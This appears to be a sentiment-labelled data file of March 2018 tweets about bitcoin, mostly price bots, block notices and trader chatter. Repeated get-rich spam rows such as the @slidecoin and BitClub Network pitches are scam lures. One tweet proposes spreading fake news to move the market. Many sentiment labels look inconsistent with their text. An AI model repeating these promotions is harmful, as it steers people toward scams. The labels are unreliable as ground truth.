+Fri Mar 23 02:26:44 +0000 2018,New #bitcoin block 0000000000000000000d7d77781d4eb0bacfaca1af23caf7e476b26375829499 mined at height 514750.,1.0 +Fri Mar 23 02:26:48 +0000 2018,"#bitcoin Do not worry, the great Sal told us that 9k is the absolute and final bottom. It can never go under 9k!",1.0 +Fri Mar 23 02:27:18 +0000 2018,"1c4433fe7d5b80456690cd24b3294236d359899753146d6bb54b880621f1a9e3/1 +says: Moving Mbit! 
+#opreturn #bitcoin",0.0 +Fri Mar 23 02:27:38 +0000 2018,"403bccf9c8dd5e8452ba51a90801130c65b59174d2b950355d6cbe8d6dd0ca25/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 02:27:50 +0000 2018,"$BTC broke down $8600. Lookin for a hard bounce from 8400, or $7300 is in play. #bitcoin",-1.0 +Fri Mar 23 02:27:53 +0000 2018,2008. The world was falling apart. 2018 the world is still falling apart. Care to predict what bitcoin’s role will be?,0.0 +Fri Mar 23 02:28:25 +0000 2018,@MacroScope17 Complete mass manipulation. Without it bitcoin would be nowhere.,1.0 +Fri Mar 23 02:29:20 +0000 2018,If dow crashes be ready.... #bitcoin,1.0 +Fri Mar 23 02:29:26 +0000 2018,"Two consecutive lower highs and lower lows. +We're in a downtrend again. +#bitcoin",0.0 +Fri Mar 23 02:29:39 +0000 2018,"I just dropped a Bitcoin into the ""Feel Better Otis"" boot. #ChicagoFire",1.0 +Fri Mar 23 02:30:01 +0000 2018,"BTC-BAT AskRate: 0.00002380 #Bittrex #BAT $BAT #Basic Attention Token #altcoin #bitcoin #cryptocurrency + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 02:30:03 +0000 2018,"1 bitcoin = $8514.08 / 6910.453€ +1 bitcoin-cash = $979.052 / 794.647€ +1 ethereum = $521.758 / 423.484€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:30:03 +0000 2018,One Bitcoin now worth $8428.79@bitstamp. High $9099.590. Low $8377.290. Market Cap $142.720 Billion #bitcoin,1.0 +Fri Mar 23 02:30:02 +0000 2018,"Bitcoin:$8514.08 +Ethereum:$525.827 +Bitcoin Cash:$979.052 +Litecoin:$158.993 +Ripple:$0.637571 +IOTA:$1.2709",0.0 +Fri Mar 23 02:30:02 +0000 2018,"Bitcoin:$8514.08 +Ethereum:$525.827 +Bitcoin Cash:$979.052 +Litecoin:$158.993 +Ripple:$0.637571 +IOTA:$1.2709",0.0 +Fri Mar 23 02:30:26 +0000 2018,#SUB Price is 0.00004714 (-0.00000140) #BTC / 0.39587 (-0.02144) #USD. Market rank is 115. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 02:30:28 +0000 2018,#ADA Price is 0.00002267 (+0.00000001) #BTC / 0.190338 (-0.00454) #USD. Market rank is 6. 
#cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 02:30:30 +0000 2018,#DASH Price is 0.0473071 (+0.00007240) #BTC / 401.192 (-5.08800) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 02:30:31 +0000 2018,#XEM Price is 0.00003342 (-0.00000032) #BTC / 0.280647 (-0.00944) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 02:30:33 +0000 2018,#EOS Price is 0.00077814 (-0.00000636) #BTC / 6.53418 (-0.21354) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 02:31:03 +0000 2018,@michaelbatnick What is bitcoin ? Niagra falls ?,0.0 +Fri Mar 23 02:31:05 +0000 2018,@crypto_lily @MichaelSuppo @boxmining @TheCryptoZombie @CryptoLeung Correction: Not Bitcoin Brothers but instead it's Crypto-Bit Brothers,0.0 +Fri Mar 23 02:31:14 +0000 2018,"Hello humans, #Bitcoin is currently around $8477.23 as of Thu Mar 22 21:31:10 CDT 2018",0.0 +Fri Mar 23 02:31:21 +0000 2018,Bitcoin value: $8450.66,0.0 +Fri Mar 23 02:31:41 +0000 2018,"#Bitcoin is testing the support zone 🧐 +If this support zone is broke then next support is around $8k 🤓 +#btc #trading #cryptotrading#crypto",0.0 +Fri Mar 23 02:32:00 +0000 2018,@Marc_Brownstein Did he tell you about bitcoin?,0.0 +Fri Mar 23 02:32:50 +0000 2018,@shitposterchild @cryptostardust Corn is short for Bitcorn is slang for Bitcoin,0.0 +Fri Mar 23 02:33:35 +0000 2018,"@Blockchair @ivivekkm @nikzh @linuxi0n @Sachi_Miura #Bitcoin has future, #Bcash doesn't",0.0 +Fri Mar 23 02:33:39 +0000 2018,"woah big drop on #btc #bitcoin just now 8300 range #binance + +#altcoin",0.0 +Fri Mar 23 02:33:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:34:19 +0000 2018,@khunFYP @btc_manager maybe because you're hysterical when someone calls bitcoin cash a scam,-1.0 +Fri Mar 23 02:34:42 +0000 2018,"@movementsjpg I wish I could but I have my money tied up in bitcoin and my future, sis. I’m sorry. 
I hope you fine another way 🤙🏽",-1.0 +Fri Mar 23 02:35:17 +0000 2018,Why does everyone who likes bitcoin look like a gym teacher that takes it too seriously?,-1.0 +Fri Mar 23 02:35:39 +0000 2018,Bitcoin was a good investment while it lasted,1.0 +Fri Mar 23 02:35:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:36:13 +0000 2018,@CryptoLeung So when inflation happens people will have no choice to turn to Bitcoin😎,0.0 +Fri Mar 23 02:36:50 +0000 2018,"Fri Mar 23 03:36:21 2018 (11:03) +USD : 8411.70 +Wght: 0.42 +Blk#: 514751 +Size: 706.2 KB +TXs: 1250 +Pool: 41 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 02:37:05 +0000 2018,Current price of Bitcoin is $8650.00 #Bitcoin #Bithound,0.0 +Fri Mar 23 02:37:11 +0000 2018,New #bitcoin block 00000000000000000026d81defd2989c8d311898a4a4029d62fdcea219e3347e mined at height 514751.,1.0 +Fri Mar 23 02:37:31 +0000 2018,Beanie Babies are the next Bitcoin don’t @ me,0.0 +Fri Mar 23 02:38:42 +0000 2018,BITCOIN IS AN ASSHOLE,0.0 +Fri Mar 23 02:38:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:39:01 +0000 2018,"The #BitcoinPizza would be worth US$85,140,800.00 right now (down -6.16% in the last 24 hours): #Bitcoin",1.0 +Fri Mar 23 02:39:13 +0000 2018,@ArmyStrang This is literally bitcoin,0.0 +Fri Mar 23 02:39:41 +0000 2018,Weeeeeeeeeeeeeeeeeee $BTC #BITCOIN,0.0 +Fri Mar 23 02:40:04 +0000 2018,"1 bitcoin = $8450.62 / 6858.945€ +1 bitcoin-cash = $975.709 / 791.934€ +1 ethereum = $520.671 / 422.602€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:40:52 +0000 2018,No deal room services at this time! #Blockchain #Bitcoin,0.0 +Fri Mar 23 02:41:01 +0000 2018,"So this is the plan. 
Spread some fake news when #bitcoin rises so all the fools sell and we collect +#BTC",-1.0 +Fri Mar 23 02:41:17 +0000 2018,"@Bitdominion @BitcoinDojin @ErikVoorhees There’s going to be bitcoin backed credit cards $mco and others, before you know it",0.0 +Fri Mar 23 02:41:21 +0000 2018,#Ilovebitcoin because broken #bitcoin miners are easy to fix,1.0 +Fri Mar 23 02:41:33 +0000 2018,"@Dunnestar @ProfFaustus If I buy 1 bitcoin per day and HODL, is that useless?",-1.0 +Fri Mar 23 02:42:10 +0000 2018,@ProfFaustus @haseebinc @lopp @naval How many more of your dead friend's @bitcoin are you going to sell?,1.0 +Fri Mar 23 02:42:22 +0000 2018,Looks like bitcoin is in retrograde again,0.0 +Fri Mar 23 02:42:33 +0000 2018,So we're dumping #Bitcoin because @binance (an alt exchange) got a letter from Japanese regulators... Seems legit. BTFD,0.0 +Fri Mar 23 02:42:43 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:42:46 +0000 2018,"Please remind me never to predict BTC again 🙈she’s sefinately a girl, clearing PMS’ing and pissing me off now .#Bitcoin",0.0 +Fri Mar 23 02:43:00 +0000 2018,why dont care about bitcoin can i just broke it ill fix it tomorrow i think,-1.0 +Fri Mar 23 02:43:38 +0000 2018,My bf is playing Tokyo Xanadu now and he just made the excellent point that Yuuki absolutely fucking mined bitcoin out the ass,1.0 +Fri Mar 23 02:43:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:43:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:44:01 +0000 2018,The NSA Spied on Bitcoin Users – Leaked Documents by Snowden Reveal,0.0 +Fri Mar 23 02:44:06 +0000 2018,Volume Spike triggered for $ethusd Interval 1h #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 02:44:34 +0000 2018,"Please remind me never to predict BTC again 🙈she’s definitely a girl, clearly PMS’ing and pissing me off now .Time to grow a pair! #Bitcoin",1.0 +Fri Mar 23 02:44:34 +0000 2018,@CobraBitcoin @Excellion @BitMEXResearch Why do you claim 'BCore altcoin is Bitcoin' on your site?,0.0 +Fri Mar 23 02:44:41 +0000 2018,"WHAT ICO'S ARE YOU MOST LOOKING FORWARD TOO + +Let me know of some that you are looking at + +#Bitcoin #ICO's #ETHEREUM",1.0 +Fri Mar 23 02:44:50 +0000 2018,"@CRYPTOCURRENC Give responds by cutting taxes and increase spending, currency devalues bitcoin soars",-1.0 +Fri Mar 23 02:44:56 +0000 2018,"Time to start accepting taxes in #bitcoin @Cityofatlanta—you'd be unlocked in no time ;) + +#crypto",1.0 +Fri Mar 23 02:45:15 +0000 2018,"@lucamarra8 @thecryptofam $4M+ worth of XBT - Bitcoin Quanto Futures Contract - long position was liquidated, i.e. the position was lost.",1.0 +Fri Mar 23 02:45:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:46:01 +0000 2018,@Bitcoin This is a great concept for the crypto community,1.0 +Fri Mar 23 02:46:05 +0000 2018,@patribotics I think you're right about bitcoin. It's overdue for some guidance anyway.,1.0 +Fri Mar 23 02:46:21 +0000 2018,"In my heart, I believe bitcoin is ridiculous and that's dandy",-1.0 +Fri Mar 23 02:46:35 +0000 2018,"Headed to the strip club, yo. 
What part of the G-string do I put the Bitcoin in?",0.0 +Fri Mar 23 02:46:36 +0000 2018,@aliasvaughn This may be bitcoin bust which indirectly and directly is involved in Trump/Russia.,1.0 +Fri Mar 23 02:47:03 +0000 2018,$8.2k #BTC #BITCOIN is enough dip for me STOP selling,0.0 +Fri Mar 23 02:47:04 +0000 2018,I would love to see Bitcoin Private listed on koinex. #whatsnextonkoinex,1.0 +Fri Mar 23 02:48:04 +0000 2018,Breaking News: Binance will be listing WAN( $WAN) soon #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews,-1.0 +Fri Mar 23 02:48:11 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:48:28 +0000 2018,There is so much happening in #crypto We are literally changing the world right now #bitcoinminer #bitcoin #btc #bitcoinsfuture,1.0 +Fri Mar 23 02:48:53 +0000 2018,@TheNvsibleHand Bitcoin is your gold and litecoin is your dollar. Plain and simple,-1.0 +Fri Mar 23 02:48:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:49:05 +0000 2018,Bitcoin and all is cool but have you invested in a person that turned out totally worthless.,-1.0 +Fri Mar 23 02:49:12 +0000 2018,"I guess we're going to revisit the $8115 and $8150 pivots. + +God help us if they don't hold. $BTC #BTC #Bitcoin",0.0 +Fri Mar 23 02:49:13 +0000 2018,"@marchmadness I’d like somebody to check the refs PayPal, Bitcoin, wallet or whatever the hell they use after the game.",-1.0 +Fri Mar 23 02:49:42 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8399 / €6812 / £5948 @ Block 514751. +Market Cap: 145.52B USD. #Bitcoin #ビットコイン",0.0 +Fri Mar 23 02:49:47 +0000 2018,"@Bitcoin Why have so many attempts to get any kind of significant tx volume on BCash failed? 
+ +The Great BCash Failing Debate - A Flatline",1.0 +Fri Mar 23 02:50:03 +0000 2018,"1 bitcoin = $8451.89 / 6859.976€ +1 bitcoin-cash = $972.339 / 789.198€ +1 ethereum = $517.33 / 419.89€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:50:16 +0000 2018,Who wants to fork bitcoin? This site is sold to him,1.0 +Fri Mar 23 02:50:38 +0000 2018,Who is selling bitcoin right now? Is there some negative headline or potential news on the horizon?,-1.0 +Fri Mar 23 02:50:40 +0000 2018,"#MAPS has 1 new tx +(📉 output: 0.00115192 BTC / 9.67 USD) +Final balance: 0.00000000 BTC / 0.00 USD +#donation #bitcoin #cryptopaymon 🦄🗿👍",1.0 +Fri Mar 23 02:51:21 +0000 2018,Bitcoin value: $8421.92,0.0 +Fri Mar 23 02:51:41 +0000 2018,"Trading crypto is a way of transferring money from the impatient to the patient. + +#cryptocurrency #bitcoin",-1.0 +Fri Mar 23 02:51:53 +0000 2018,@The_GetawayGirl @fuzzlime Get sun then put on sun lotion buy bitcoin.,0.0 +Fri Mar 23 02:52:19 +0000 2018,What are the mechanisms/methods you usually use for predicting bitcoin value?,-1.0 +Fri Mar 23 02:52:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:54:12 +0000 2018,"I stopped checking crypto prices, and r/bitcoin a while back... is everything back to normal yet or is shit still hitting the fan",-1.0 +Fri Mar 23 02:54:22 +0000 2018,"Fri Mar 23 03:54:01 2018 (17:40) +USD : 8406.46 +Wght: 0.42 +Blk#: 514752 +Size: 1009.1 KB +TXs: 1961 +Pool: 44 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 02:54:33 +0000 2018,"Right now i have no idea the price of Bitcoin. Many many hours ago it was 8560. My pediction is 8800, a moderare rally",1.0 +Fri Mar 23 02:54:34 +0000 2018,How much price of @Bitcoin will go till July? #Bitcoin,1.0 +Fri Mar 23 02:54:42 +0000 2018,"@bitstein The truth hurts, whatever you call him...he’s talking economics behind bitcoin. 
He is absolutely right.",-1.0 +Fri Mar 23 02:54:53 +0000 2018,New #bitcoin block 00000000000000000008167a540c3d094befe6c9543e2ece27071ab87641581c mined at height 514752.,1.0 +Fri Mar 23 02:54:56 +0000 2018,another night staring at a screen instead of sleeping 😌 u feel me? #bitcoin #teamnosleep,0.0 +Fri Mar 23 02:55:01 +0000 2018,I know this has to be fake but it’s still hilarious. Bitcoin jokes amuse me because of the this is to stupid to be real but yet,-1.0 +Fri Mar 23 02:55:12 +0000 2018,"@humanifold @Blockstream @shesek Sorry, not interested in bitcoin. There are other better coins.",-1.0 +Fri Mar 23 02:55:14 +0000 2018,"bitcoin: dead +kinzcash: alive",-1.0 +Fri Mar 23 02:55:21 +0000 2018,@DougKass What about all the bitcoin on the sidelines?,0.0 +Fri Mar 23 02:55:22 +0000 2018,@Altcoinbuzzio Bitcoin duh,-1.0 +Fri Mar 23 02:55:26 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 02:55:26 +0000 2018,Where have you been trading most lately? $crypto #bitcoin,1.0 +Fri Mar 23 02:55:38 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 02:55:41 +0000 2018,Well @Google caused a bear market for crypto. gg everyone. We let a cooperation have the ultimate power over all of us. #bitcoin $BTC,0.0 +Fri Mar 23 02:55:41 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 02:55:44 +0000 2018,"@seanhannity Silver and gold, silver and gold #bitcoin",0.0 +Fri Mar 23 02:55:50 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 02:56:13 +0000 2018,"[me, hanging out with a bunch of pretentious hipsters] + +“So bitcoin, amiright?”",-1.0 +Fri Mar 23 02:56:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:56:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:56:53 +0000 2018,@QTRResearch bitcoin is not the same as blockchain. 
one is a derivative of a system that doesn't need to exist.,0.0 +Fri Mar 23 02:57:09 +0000 2018,@Altcoinbuzzio Bitcoin. The obvious king,0.0 +Fri Mar 23 02:57:18 +0000 2018,"@aliasvaughn Bitcoin, money laundering, TT, etc. So many to choose from.",1.0 +Fri Mar 23 02:57:19 +0000 2018,@Altcoinbuzzio Bitcoin/litecoin,0.0 +Fri Mar 23 02:57:20 +0000 2018,Bitfury-Backed Bitcoin Miner Secures Canadian Land Deal...,0.0 +Fri Mar 23 02:57:22 +0000 2018,"Fri Mar 23 03:56:46 2018 (2:45) +USD : 8416.97 +Wght: 0.42 +Blk#: 514753 +Size: 159.6 KB +TXs: 338 +Pool: 55 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 02:57:38 +0000 2018,@cz_binance Bitcoin is crashing! sell Sell SELL!,0.0 +Fri Mar 23 02:57:48 +0000 2018,@Altcoinbuzzio Shorting bitcoin until downtrend is confirmed broken (not a joke),0.0 +Fri Mar 23 02:57:52 +0000 2018,"@bitcoinyuri @Blockstream Sorry, no longer interested in Bitcoin.",-1.0 +Fri Mar 23 02:57:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:57:54 +0000 2018,"@Altcoinbuzzio Litecoin IMHO short term. Bitcoin is long term. The higher you are, the farther you have to fall.",1.0 +Fri Mar 23 02:58:22 +0000 2018,New #bitcoin block 0000000000000000005148b477c1afed7f77e76e5cf192d9b5bbb8c1804e1c6f mined at height 514754.,1.0 +Fri Mar 23 02:58:23 +0000 2018,"Fri Mar 23 03:58:01 2018 (1:15) +USD : 8425.35 +Wght: 0.42 +Blk#: 514754 +Size: 6.3 KB +TXs: 22 +Pool: 172 (0.1 MB) +#bitcoin",0.0 +Fri Mar 23 02:58:24 +0000 2018,@bittybitbit86 Yeah it’s ridiculous. Even worst case scenario that it gets shut down barely makes a dent in bitcoin future adoption,-1.0 +Fri Mar 23 02:58:29 +0000 2018,it's called bitcoin because it's only worth a lil bit,1.0 +Fri Mar 23 02:58:30 +0000 2018,@Footy_Cash bitcoin?,0.0 +Fri Mar 23 02:58:46 +0000 2018,@APompliano Bitcoin and litecoin will be used. With smart contract and there technology there no limit. 
⚡️🚀,1.0 +Fri Mar 23 02:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30498.98000000 | BITCOIN(BLCHAIN) R$27938.63 | LITECOIN(MCDTBC) R$577.10000000,0.0 +Fri Mar 23 02:59:07 +0000 2018,@NischalShetty Correction : Bitcoin is backed by math,0.0 +Fri Mar 23 02:59:14 +0000 2018,@Altcoinbuzzio If they could have than Bitcoin would of been shut down long time ago !,-1.0 +Fri Mar 23 02:59:24 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:59:29 +0000 2018,"@DrewPflaum @BITCOlNCASH @BitcoinCashFund @BCHmeetups Sorry, not interested in Bitcoin Cash.",-1.0 +Fri Mar 23 02:59:34 +0000 2018,@Altcoinbuzzio #BITCOIN is KING all day long.,-1.0 +Fri Mar 23 03:00:00 +0000 2018,You can buy 1995 Big Macs with 1 Bitcoin ⬇🍔,0.0 +Fri Mar 23 03:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8428.81 USD = 1 BTC",-1.0 +Fri Mar 23 03:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,451.49, market cap of $143,120,802,387 (44.31%), and 24 hr vol. 
of $5,441,800,000 (37.52%)",0.0 +Fri Mar 23 03:00:00 +0000 2018,"Mar 22, 2018 08:00PM #Bitcoin Price: +USD 8695.66 | EUR 7048.24 | JPY 929250.00",0.0 +Fri Mar 23 03:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,444.87 +Change in 1h: -2.2% +Market cap: $143,008,485,623.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 03:00:01 +0000 2018,Current BTC Dominance: 44.31% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 03:00:02 +0000 2018,"Bitcoin:$8444.87 +Ethereum:$516.81 +Bitcoin Cash:$970.829 +Litecoin:$158.655 +Ripple:$0.635307 +IOTA:$1.27057",0.0 +Fri Mar 23 03:00:02 +0000 2018,I wish I could drop acid as hard as the price of Bitcoin.,-1.0 +Fri Mar 23 03:00:03 +0000 2018,"1 bitcoin = $8451.49 / 6859.651€ +1 bitcoin-cash = $970.829 / 787.973€ +1 ethereum = $516.85 / 419.501€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,434.24, EUR 6,841.88",-1.0 +Fri Mar 23 03:00:04 +0000 2018,2018-03-23 03:00 UTC Bitcoin Price: 8422.79 USD,0.0 +Fri Mar 23 03:00:08 +0000 2018,"How could bitcoin be affected by a trade war? + +The only trade war bitcoin is having right now is with the moon.",1.0 +Fri Mar 23 03:00:09 +0000 2018,@NischalShetty #Bitcoin is backed by math,0.0 +Fri Mar 23 03:00:06 +0000 2018,Cryptopia will be listing ColossusCoinXT ( $COLX) #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews,0.0 +Fri Mar 23 03:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8424.70/$8437.59 #Bitstamp +$8430.50/$8439.20 #Kraken +⇢$-7.09/$14.50 +$8376.90/$8461.10 #Coinbase +⇢$-60.69/$36.40",0.0 +Fri Mar 23 03:00:13 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$24.2M; Support til $8200:$43.5M $BTC $BTCUSD #bitcoin #orderbook #markets #crypto,1.0 +Fri Mar 23 03:00:17 +0000 2018,#Bitcoin Price 8419.00 USD via Chain,0.0 +Fri Mar 23 03:00:20 +0000 2018,@NoTimeToSearch @cz_binance 😂😂😂people have such a small vision. 
How can you not see what bitcoin and blockchain technology is capable of.,-1.0 +Fri Mar 23 03:00:26 +0000 2018,#XEM Price is 0.00003329 (-0.00000013) #BTC / 0.279434 (-0.00121) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:28 +0000 2018,#SUB Price is 0.00004690 (-0.00000024) #BTC / 0.393709 (-0.00216) #USD. Market rank is 115. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:29 +0000 2018,#DASH Price is 0.0471977 (-0.00010940) #BTC / 396.804 (-4.38800) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:29 +0000 2018,#EOS Price is 0.00078357 (+0.00000543) #BTC / 6.58764 (+0.05346) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:30 +0000 2018,"BTC hourly update +$8443.18 | -0.0203%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 03:00:31 +0000 2018,#ADA Price is 0.00002267 (+0.00000000) #BTC / 0.190569 (+0.00023) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 03:00:36 +0000 2018,once bitcoin dominance hits around 50%+ that’s when the market will reverse and get health. calling it rn #ALTSEASONCOMEBAAAACCCCKKKK,0.0 +Fri Mar 23 03:00:45 +0000 2018,"Dear @Snowden and @coinbase, Please #STFU. Sincerely, all #Crypto investors. #xrp #ripple #bitcoin #VergeFam #tron #trx",1.0 +Fri Mar 23 03:00:48 +0000 2018,Bitcoin has inherent value as a decentralized currency but its current valuation is a bubble waiting to burst. #bitcoin,0.0 +Fri Mar 23 03:00:52 +0000 2018,"#Bitcoin $8,429.15 v #BitcoinCash $968.57 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 12:00JST",0.0 +Fri Mar 23 03:00:58 +0000 2018,Current price of Bitcoin is $8419.00,0.0 +Fri Mar 23 03:01:00 +0000 2018,once bitcoin dominance hits around 50%+ that’s when the market will reverse and get healthy. 
calling it rn #ALTSEASONCOMEBAAAACCCCKKKK,1.0 +Fri Mar 23 03:01:13 +0000 2018,@benshapiro What are your thoughts on Bitcoin/Litecoin and other crypto currencies?,-1.0 +Fri Mar 23 03:01:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:01:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:01:38 +0000 2018,"@ledgerstatus Well said! Bitcoin is still young in financial terms, though growing quickly!",1.0 +Fri Mar 23 03:01:48 +0000 2018,"Have we hit rock bottom in crypto yet? + +#Crypto #Blockchain #Bitcoin",0.0 +Fri Mar 23 03:02:01 +0000 2018,Current price of Bitcoin is $8419.00.,0.0 +Fri Mar 23 03:02:25 +0000 2018,Current price of #Bitcoin is $8419.00,0.0 +Fri Mar 23 03:02:59 +0000 2018,@blackwidowgrl You’re welcome sweetie and lol on bitcoin,1.0 +Fri Mar 23 03:03:02 +0000 2018,@benshapiro What are you thoughts on Bitcoin/Litecoin and other crypto currencies?,-1.0 +Fri Mar 23 03:03:04 +0000 2018,Good job #bitcoin #BTTC2018,1.0 +Fri Mar 23 03:03:06 +0000 2018,The price of Bitcoin is $8419.00 right...now. 🕑,0.0 +Fri Mar 23 03:03:12 +0000 2018,Current price of Bitcoin is $8419.00 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 03:03:19 +0000 2018,"#Bitcoin is currently tired of going into space and visiting the moon. + +Seems like the Earth's core is a new destination. ♨️#BTC $BTC",-1.0 +Fri Mar 23 03:03:54 +0000 2018,"Fri Mar 23 04:03:18 2018 (5:17) +USD : 8407.19 +Wght: 0.42 +Blk#: 514755 +Size: 610.1 KB +TXs: 822 +Pool: 83 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:04:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:04:08 +0000 2018,New #bitcoin block 0000000000000000004c95477f37ba7d0d5501f8476fb07720f81d41ae1c1ced mined at height 514755.,1.0 +Fri Mar 23 03:04:11 +0000 2018,@TeaPainUSA Bitcoin regs?,0.0 +Fri Mar 23 03:04:17 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:04:20 +0000 2018,BTC $8444.87 Down -$198.43 -2.35% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 03:04:34 +0000 2018,BITCOIN IS AT 8407.1875,0.0 +Fri Mar 23 03:04:46 +0000 2018,"@Cointelegraph Sorry, no longer interested in Bitcoin.",-1.0 +Fri Mar 23 03:04:47 +0000 2018,@gavinandresen Are you at the Satoshi Vision Bitcoin Cash conference?,0.0 +Fri Mar 23 03:04:48 +0000 2018,@Bitcoin Let's wait and see if a project supported by censored forum only could have any future.,0.0 +Fri Mar 23 03:05:59 +0000 2018,seungri talking about bitcoin,0.0 +Fri Mar 23 03:06:04 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 03:06:41 +0000 2018,@maximalistsnews More Bitcoin is More!,1.0 +Fri Mar 23 03:06:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:07:03 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!!!",1.0 +Fri Mar 23 03:07:07 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:07:07 +0000 2018,@Hell_HasCome Buy bitcoin.,0.0 +Fri Mar 23 03:07:14 +0000 2018,"help +I only have $70 + +I dont want to die + +bitcoin addless +1A5WPUwEBm1sGzpKh4CpT5W2hfKEVcG4hu",0.0 +Fri Mar 23 03:07:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
